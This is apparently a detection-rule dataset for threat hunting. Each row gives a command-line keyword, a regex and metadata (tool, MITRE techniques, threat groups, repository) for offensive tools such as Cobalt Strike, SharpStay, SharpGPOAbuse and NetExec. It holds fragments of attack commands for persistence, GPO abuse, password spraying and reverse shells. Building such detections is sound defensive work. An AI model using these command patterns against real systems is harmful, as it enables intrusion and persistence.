1.2.3.4:8080*",".{0,1000}\s1\.2\.3\.4\:8080.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* 11_Credentials.py*",".{0,1000}\s11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 13_NoseyParker.py*",".{0,1000}\s13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 17_Custom_Cracklist.py*",".{0,1000}\s17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 2>&1 && certutil -encodehex -f * && for /F ""usebackq"" * reg add HKLM\*","\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s\-f\s.{0,1000}\s\&\&\sfor\s\/F\s\""usebackq\""\s.{0,1000}\sreg\sadd\sHKLM\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* 365-Stealer *",".{0,1000}\s365\-Stealer\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* 4444 meter",".{0,1000}\s4444\smeter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* 4444 shell",".{0,1000}\s4444\sshell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* '46993522-7D77-4B59-9B77-F82082DE9D81' *",".{0,1000}\s\'46993522\-7D77\-4B59\-9B77\-F82082DE9D81\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* -64 -format=bof *",".{0,1000}\s\-64\s\-format\=bof\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -64 -format=dll *",".{0,1000}\s\-64\s\-format\=dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -64 -format=service-dll *",".{0,1000}\s\-64\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* 9_DPAPI.py*",".{0,1000}\s9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -a 1 -f *.dll -p http*",".{0,1000}\s\-a\s1\s\-f\s.{0,1000}\.dll\s\-p\shttp.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* -a bruteforce *",".{0,1000}\s\-a\sbruteforce\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -a nightmare*",".{0,1000}\s\-a\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a spoolsample*",".{0,1000}\s\-a\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sInject\'\s\-t\sdisableLeaveAlert\=true\s\-t\sdisableReconnect\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sShell\'\s\-t\sdisableLeaveAlert\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* aad3b435b51404eeaad3b435b51404ee*",".{0,1000}\saad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* acarsd-info.nse*",".{0,1000}\sacarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* acltoolkit*",".{0,1000}\sacltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* --action exports --dll C:\Windows\System32\amsi.dll*",".{0,1000}\s\-\-action\sexports\s\-\-dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --action SPRAY_USERS *",".{0,1000}\s\-\-action\sSPRAY_USERS\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* action=BackdoorLNK *",".{0,1000}\saction\=BackdoorLNK\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=CreateService servicename=* command=*",".{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ElevatedRegistryKey keyname=Debug keypath*",".{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ElevatedUserInitKey command=*",".{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=JunctionFolder dllpath=*.dll guid=*",".{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=NewLNK filepath=*"" lnkname=*",".{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\""\slnkname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ScheduledTask taskname=* command=*runasuser*",".{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ScheduledTaskAction taskname=* command=*",".{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=SchTaskCOMHijack clsid=*",".{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=UserRegistryKey keyname=Debug keypath=HKCU:*",".{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=WMIEventSub command=* eventname=*",".{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* ADAudit.ps1*",".{0,1000}\sADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "* ADCollector.exe*",".{0,1000}\sADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* --adcs --filter * --ntaccount * --enroll *",".{0,1000}\s\-\-adcs\s\-\-filter\s.{0,1000}\s\-\-ntaccount\s.{0,1000}\s\-\-enroll\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* --adcs --old-bloodhound *",".{0,1000}\s\-\-adcs\s\-\-old\-bloodhound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* adcsync.py*",".{0,1000}\sadcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "* add * demon.x64.exe*",".{0,1000}\sadd\s.{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#contentstrings","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* add nc without being detected by antivirus*",".{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* addcomputer_LDAP_spn.py*",".{0,1000}\saddcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* addcomputer_with_spns.py *",".{0,1000}\saddcomputer_with_spns\.py\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *",".{0,1000}\s\-\-AddComputerTask\s\-\-TaskName\s.{0,1000}\s\-\-Author\s.{0,1000}\s\-\-Command\s.{0,1000}\s\-\-Arguments\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* --AddLocalAdmin --UserAccount * --GPOName *",".{0,1000}\s\-\-AddLocalAdmin\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* Add-RemoteRegBackdoor.ps1*",".{0,1000}\sAdd\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* address-info.nse*",".{0,1000}\saddress\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --AddUserRights --UserRights * --UserAccount * --GPOName *",".{0,1000}\s\-\-AddUserRights\s\-\-UserRights\s.{0,1000}\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* --AddUserScript --ScriptName * --ScriptContents * --GPOName *",".{0,1000}\s\-\-AddUserScript\s\-\-ScriptName\s.{0,1000}\s\-\-ScriptContents\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense 